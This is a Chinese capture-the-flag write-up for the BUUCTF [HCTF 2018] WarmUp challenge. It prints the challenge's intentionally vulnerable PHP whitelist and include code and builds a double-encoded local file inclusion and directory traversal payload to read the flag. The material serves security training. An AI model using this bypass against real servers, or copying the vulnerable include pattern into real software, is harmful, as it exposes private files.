BUUCTF [HCTF 2018]WarmUp
Posted 热绪
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUUCTF [HCTF 2018]WarmUp相关的知识,希望对你有一定的参考价值。
访问链接
F12查看源码
试着在url后面加入source.php
访问hint.php
侥幸的试了一下。
无结果,可以看出是代码审计问题。试着分析一下源码。
<?php
highlight_file(__FILE__);
//使用highlight_file函数,想到可能是与文件相关的漏洞
class emmm
{
public static function checkFile(&$page)
//这里传入参数page
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
//whitelist白名单,这也就知道之前为什么是404了
if (! isset($page) || !is_string($page)) {
//这里page必须存在且是字符串才可以进入
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
//in_array() 函数搜索数组中是否存在指定的值,白名单过滤,可能考点在绕过白名单。
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
//mb_substr 是个截断,返回0到mb_strpos之间的内容。
//mb_strpos 则是查找第一次出现的位置,所以可以理解为获取page两个?之间的字符串,也就是获取file两个?之间的字符串,其实到这里可以猜出是文件包含。
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
//urldecode() 解码 URL 字符串函数。然后进行以上判断
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\\" />";
}
//必须满足if条件,才能包含file,这里也可以猜到是文件包含
?>
5个if语句,先判断是否为空,且为字符串。然后判断是否为白名单内;然后截断后判断是否为白名单内,然后判断解码之后是否在白名单内部,然后是文件包含的if判断。
构造payload:
source.php?file=hint.php%253f../../../../../ffffllllaaaagggg
'?'两次编码值为'%253f'
思路总结:F12查看源码得知,source.php是index.php的源码。代码审计发现发现是文件包含漏洞利用,且使用白名单过滤,绕过并使用本地文件包含+目录跳转找出flag。
以上是关于BUUCTF [HCTF 2018]WarmUp的主要内容,如果未能解决你的问题,请参考以下文章